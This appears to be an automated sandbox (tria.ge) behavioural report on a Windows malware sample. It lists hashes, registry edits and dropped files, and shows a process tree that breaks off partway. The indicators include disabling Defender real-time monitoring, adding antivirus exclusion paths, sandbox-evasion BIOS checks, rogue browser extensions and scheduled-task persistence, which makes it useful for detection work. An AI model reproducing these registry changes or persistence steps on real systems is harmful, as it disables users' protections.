Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
129s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
06/02/2023, 10:56
Static task
static1
Behavioral task
behavioral1
Sample
627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe
Resource
win7-20220901-en
General
-
Target
627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe
-
Size
7.3MB
-
MD5
e9df6a41ca4941817e0da65dd35d6508
-
SHA1
d1efb6b9745f5fcf6f34a0e4f7d148133a4289eb
-
SHA256
627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c
-
SHA512
7b850ea47e68386168db3d64e094347ebb87717d690a395352084cf8dd334449f382dff75eba04770e112ec85f742204d4ac592a1513327c5588c10f28490f54
-
SSDEEP
196608:91OTdISgFWHU76tSdBQ2EfgFLfCceIqTMf:3OTGy0WS/QloFLbe+
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JuPVqtTuU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wRZxVByAcqfAC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hRSVwMivPDBwjMVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dDIGKoNsMZUYTlNI = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dDIGKoNsMZUYTlNI = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dDIGKoNsMZUYTlNI = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\phVJOPZyZJOU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\phVJOPZyZJOU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wRZxVByAcqfAC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JuPVqtTuU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NCzfTsUHwfUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hRSVwMivPDBwjMVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dDIGKoNsMZUYTlNI = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NCzfTsUHwfUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 2016 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation DIgdmmJ.exe -
Executes dropped EXE 4 IoCs
pid Process 1068 Install.exe 2004 Install.exe 1956 XXlxCEo.exe 1044 DIgdmmJ.exe -
Loads dropped DLL 12 IoCs
pid Process 1408 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe 1068 Install.exe 1068 Install.exe 1068 Install.exe 1068 Install.exe 2004 Install.exe 2004 Install.exe 2004 Install.exe 2016 rundll32.exe 2016 rundll32.exe 2016 rundll32.exe 2016 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json DIgdmmJ.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 DIgdmmJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat DIgdmmJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 DIgdmmJ.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA DIgdmmJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA DIgdmmJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 DIgdmmJ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol DIgdmmJ.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol XXlxCEo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA DIgdmmJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini XXlxCEo.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA DIgdmmJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 DIgdmmJ.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol XXlxCEo.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\phVJOPZyZJOU2\FBIXlpX.xml DIgdmmJ.exe File created C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\mrrqbOR.dll DIgdmmJ.exe File created C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\dgoNAPG.xml DIgdmmJ.exe File created C:\Program Files (x86)\wRZxVByAcqfAC\wJaHoYc.xml DIgdmmJ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi DIgdmmJ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja DIgdmmJ.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak DIgdmmJ.exe File created C:\Program Files (x86)\JuPVqtTuU\yAawgAz.xml DIgdmmJ.exe File created C:\Program Files (x86)\phVJOPZyZJOU2\kXuqSBbJHAqRv.dll DIgdmmJ.exe File created C:\Program Files (x86)\wRZxVByAcqfAC\uYaROYg.dll DIgdmmJ.exe File created C:\Program Files (x86)\NCzfTsUHwfUn\DbvFZFu.dll DIgdmmJ.exe File created C:\Program Files (x86)\JuPVqtTuU\XqBJAR.dll DIgdmmJ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi DIgdmmJ.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bsajrHInQFlcwYICLj.job schtasks.exe File created C:\Windows\Tasks\ygwXmmYWmIOQZqgey.job schtasks.exe File created C:\Windows\Tasks\HnhGGmYUcuANzZs.job schtasks.exe File created C:\Windows\Tasks\ClHbhijVssadMpWzU.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1932 schtasks.exe 1464 schtasks.exe 1688 schtasks.exe 1952 schtasks.exe 604 schtasks.exe 996 schtasks.exe 1092 schtasks.exe 436 schtasks.exe 1784 schtasks.exe 916 schtasks.exe 1096 schtasks.exe 1356 schtasks.exe 972 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-f2-bf-f9-a9-5d\WpadDecisionReason = "1" DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DIgdmmJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CE4FE25D-CB12-41E0-8834-D2BDB6C0A482}\WpadNetworkName = "Network 2" DIgdmmJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CE4FE25D-CB12-41E0-8834-D2BDB6C0A482}\WpadDecision = "0" DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DIgdmmJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-f2-bf-f9-a9-5d\WpadDecisionReason = "1" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" DIgdmmJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" DIgdmmJ.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-f2-bf-f9-a9-5d\WpadDecisionTime = 4022e4e9193ad901 DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" DIgdmmJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CE4FE25D-CB12-41E0-8834-D2BDB6C0A482}\WpadDecisionReason = "1" DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DIgdmmJ.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0018000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-f2-bf-f9-a9-5d\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DIgdmmJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-f2-bf-f9-a9-5d\WpadDecision = "0" DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-f2-bf-f9-a9-5d rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CE4FE25D-CB12-41E0-8834-D2BDB6C0A482}\b6-f2-bf-f9-a9-5d rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CE4FE25D-CB12-41E0-8834-D2BDB6C0A482}\b6-f2-bf-f9-a9-5d DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DIgdmmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DIgdmmJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 456 powershell.EXE 456 powershell.EXE 456 powershell.EXE 856 powershell.EXE 856 powershell.EXE 856 powershell.EXE 1104 powershell.EXE 1104 powershell.EXE 1104 powershell.EXE 1464 powershell.EXE 1464 powershell.EXE 1464 powershell.EXE 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe 1044 DIgdmmJ.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 456 powershell.EXE Token: SeDebugPrivilege 856 powershell.EXE Token: SeDebugPrivilege 1104 powershell.EXE Token: SeDebugPrivilege 1464 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1408 wrote to memory of 1068 1408 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe 27 PID 1408 wrote to memory of 1068 1408 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe 27 PID 1408 wrote to memory of 1068 1408 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe 27 PID 1408 wrote to memory of 1068 1408 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe 27 PID 1408 wrote to memory of 1068 1408 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe 27 PID 1408 wrote to memory of 1068 1408 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe 27 PID 1408 wrote to memory of 1068 1408 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe 27 PID 1068 wrote to memory of 2004 1068 Install.exe 28 PID 1068 wrote to memory of 2004 1068 Install.exe 28 PID 1068 wrote to memory of 2004 1068 Install.exe 28 PID 1068 wrote to memory of 2004 1068 Install.exe 28 PID 1068 wrote to memory of 2004 1068 Install.exe 28 PID 1068 wrote to memory of 2004 1068 Install.exe 28 PID 1068 wrote to memory of 2004 1068 Install.exe 28 PID 2004 wrote to memory of 1640 2004 Install.exe 31 PID 2004 wrote to memory of 1640 2004 Install.exe 31 PID 2004 wrote to memory of 1640 2004 Install.exe 31 PID 2004 wrote to memory of 1640 2004 Install.exe 31 PID 2004 wrote to memory of 1640 2004 Install.exe 31 PID 2004 wrote to memory of 1640 2004 Install.exe 31 PID 2004 wrote to memory of 1640 2004 Install.exe 31 PID 2004 wrote to memory of 1072 2004 Install.exe 32 PID 2004 wrote to memory of 1072 2004 Install.exe 32 PID 2004 wrote to memory of 1072 2004 Install.exe 32 PID 2004 wrote to memory of 1072 2004 Install.exe 32 PID 2004 wrote to memory of 1072 2004 Install.exe 32 PID 2004 wrote to memory of 1072 2004 Install.exe 32 PID 2004 wrote to memory of 1072 2004 Install.exe 32 PID 1640 wrote to memory of 1436 1640 forfiles.exe 33 PID 1640 wrote to memory of 1436 1640 forfiles.exe 33 PID 1640 wrote to memory of 1436 1640 forfiles.exe 33 PID 1640 wrote to memory of 1436 1640 forfiles.exe 33 PID 1640 wrote to memory of 1436 1640 forfiles.exe 33 PID 1640 wrote to memory of 1436 1640 forfiles.exe 33 PID 1640 wrote to memory of 1436 1640 forfiles.exe 33 PID 1072 wrote to memory of 1520 1072 forfiles.exe 35 PID 1072 wrote to memory of 1520 1072 forfiles.exe 35 PID 1072 wrote to memory of 1520 1072 forfiles.exe 35 PID 1072 wrote to memory of 1520 1072 forfiles.exe 35 PID 1072 wrote to memory of 1520 1072 forfiles.exe 35 PID 1072 wrote to memory of 1520 1072 forfiles.exe 35 PID 1072 wrote to memory of 1520 1072 forfiles.exe 35 PID 1520 wrote to memory of 1444 1520 cmd.exe 36 PID 1520 wrote to memory of 1444 1520 cmd.exe 36 PID 1520 wrote to memory of 1444 1520 cmd.exe 36 PID 1520 wrote to memory of 1444 1520 cmd.exe 36 PID 1520 wrote to memory of 1444 1520 cmd.exe 36 PID 1520 wrote to memory of 1444 1520 cmd.exe 36 PID 1520 wrote to memory of 1444 1520 cmd.exe 36 PID 1436 wrote to memory of 2024 1436 cmd.exe 37 PID 1436 wrote to memory of 2024 1436 cmd.exe 37 PID 1436 wrote to memory of 2024 1436 cmd.exe 37 PID 1436 wrote to memory of 2024 1436 cmd.exe 37 PID 1436 wrote to memory of 2024 1436 cmd.exe 37 PID 1436 wrote to memory of 2024 1436 cmd.exe 37 PID 1436 wrote to memory of 2024 1436 cmd.exe 37 PID 1520 wrote to memory of 1104 1520 cmd.exe 39 PID 1520 wrote to memory of 1104 1520 cmd.exe 39 PID 1520 wrote to memory of 1104 1520 cmd.exe 39 PID 1520 wrote to memory of 1104 1520 cmd.exe 39 PID 1520 wrote to memory of 1104 1520 cmd.exe 39 PID 1520 wrote to memory of 1104 1520 cmd.exe 39 PID 1436 wrote to memory of 812 1436 cmd.exe 38 PID 1436 wrote to memory of 812 1436 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe"C:\Users\Admin\AppData\Local\Temp\627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Users\Admin\AppData\Local\Temp\7zS60A.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\7zSABB.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2004 -
